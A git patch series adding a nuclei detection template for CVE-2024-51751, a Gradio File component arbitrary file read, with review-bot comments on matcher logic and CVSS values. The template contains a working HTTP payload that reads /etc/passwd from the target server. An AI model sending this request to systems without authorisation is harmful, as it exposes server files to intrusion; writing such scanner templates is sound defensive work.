From c9fe61dd17cb2d4b8ec7fb1fa7889c23c6e12230 Mon Sep 17 00:00:00 2001
From: Yejune Ko <57734106+KoYejune0302@users.noreply.github.com>
Date: Sat, 4 Jan 2025 14:19:24 +0900
Subject: [PATCH 1/2] Create CVE-2024-51751.yaml
---
code/cves/2024/CVE-2024-51751.yaml | 86 ++++++++++++++++++++++++++++++
1 file changed, 86 insertions(+)
create mode 100644 code/cves/2024/CVE-2024-51751.yaml
diff --git a/code/cves/2024/CVE-2024-51751.yaml b/code/cves/2024/CVE-2024-51751.yaml
new file mode 100644
index 00000000000..603b26483c8
--- /dev/null
+++ b/code/cves/2024/CVE-2024-51751.yaml
@@ -0,0 +1,86 @@
+id: CVE-2024-51751
+
+info:
+ name: Gradio File Component Arbitrary File Read
+ author: KoYejune0302, gy741
+ severity: high
+ description: |
+ If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-51751
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-51751
+ - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248
+ tags: cve, cve2024, gradio, file-read
+
+http:
+ # Pre-condition check: Ensure the server returns {"error":null} for a valid request
+ - raw:
+ - |
+ POST /gradio_api/run/predict HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Content-Length: 245
+
+ {
+ "data": [
+ {
+ "path": "/tmp/safe_file.txt",
+ "orig_name": "safe_file.txt",
+ "size": 4,
+ "mime_type": "text/plain",
+ "meta": {
+ "_type": "gradio.FileData"
+ }
+ }
+ ],
+ "event_data": null,
+ "fn_index": 0,
+ "trigger_id": 8,
+ "session_hash": "mnv42s5gt7"
+ }
+
+ matchers:
+ - type: word
+ words:
+ - '{"error":null}'
+ part: body
+
+ # Vulnerability check: Attempt to read /etc/passwd without the meta field
+ - raw:
+ - |
+ POST /gradio_api/run/predict HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Content-Length: 215
+
+ {
+ "data": [
+ {
+ "path": "/etc/passwd",
+ "orig_name": "test.txt",
+ "size": 4,
+ "mime_type": "text/plain"
+ }
+ ],
+ "event_data": null,
+ "fn_index": 0,
+ "trigger_id": 8,
+ "session_hash": "mnv42s5gt7"
+ }
+
+ matchers:
+ - type: regex
+ regex:
+ - 'root:.*:0:0:'
+ part: body
+
+ extractors:
+ - type: regex
+ name: passwd_content
+ regex:
+ - 'root:.*:0:0:'
+ part: body
+ group: 1
From 2e126ef9afefdb863db9a8d0b32c9fb8b792fa72 Mon Sep 17 00:00:00 2001
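Review bot: The "pre-condition check" is a separate entry in the `http` list with its own `word` matcher on `{"error":null}`, so nuclei will report this template as matched for any host that answers the benign `/tmp/safe_file.txt` request that way, whether or not the `/etc/passwd` request returns anything — as written it is a false-positive source, not a gate. To make it a real precondition, put both raw requests under one entry with `req-condition: true` and a single DSL matcher that requires the passwd signature in the second response (sketch below), or simply delete the first matcher. The hardcoded `fn_index: 0`, `trigger_id: 8` and `session_hash` assume one particular app layout and will silently miss apps whose File component is bound to a different function index; a comment such as `# fn_index/trigger_id assume the File component is the first registered event — adjust per target` would at least make that explicit. The literal `Content-Length: 245` / `215` values are also fragile since the bodies are hand-typed; I believe nuclei recomputes the header for raw requests unless `unsafe: true` is set, so dropping both lines is safer than keeping them in sync by hand.

```yaml
http:
  - raw:
      # … unchanged: benign /tmp/safe_file.txt request (first `- |` block) …
      # … unchanged: /etc/passwd request without "meta" (second `- |` block) …

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "{\"error\":null}") && regex("root:.*:0:0:", body_2)'
```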
From: Yejune Ko <57734106+KoYejune0302@users.noreply.github.com>
Date: Sat, 4 Jan 2025 14:26:37 +0900
Subject: [PATCH 2/2] Update CVE-2024-51751.yaml
---
code/cves/2024/CVE-2024-51751.yaml | 10 +---------
1 file changed, 1 insertion(+), 9 deletions(-)
diff --git a/code/cves/2024/CVE-2024-51751.yaml b/code/cves/2024/CVE-2024-51751.yaml
index 603b26483c8..322fb04fdcb 100644
--- a/code/cves/2024/CVE-2024-51751.yaml
+++ b/code/cves/2024/CVE-2024-51751.yaml
@@ -3,7 +3,7 @@ id: CVE-2024-51751 info: name: Gradio File Component Arbitrary File Read author: KoYejune0302, gy741 - severity: high + severity: medium description: | If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. classification: @@ -76,11 +76,3 @@ http: regex: - 'root:.*:0:0:' part: body - - extractors: - - type: regex - name: passwd_content - regex: - - 'root:.*:0:0:' - part: body - group: 1
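Review bot: `severity: medium` now agrees with the `cvss-score: 6.5` line, but the `cvss-metrics` vector in the same `info` block (just below this hunk, added in the first patch) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` — evaluates to 6.1 under the CVSS 3.1 formula, not 6.5, so score and vector still disagree. Take both values together from the referenced GHSA advisory so they are self-consistent: either change the line to `cvss-score: 6.1` or replace the vector with the one the advisory publishes. Either outcome keeps the severity at `medium`, so this hunk itself is fine.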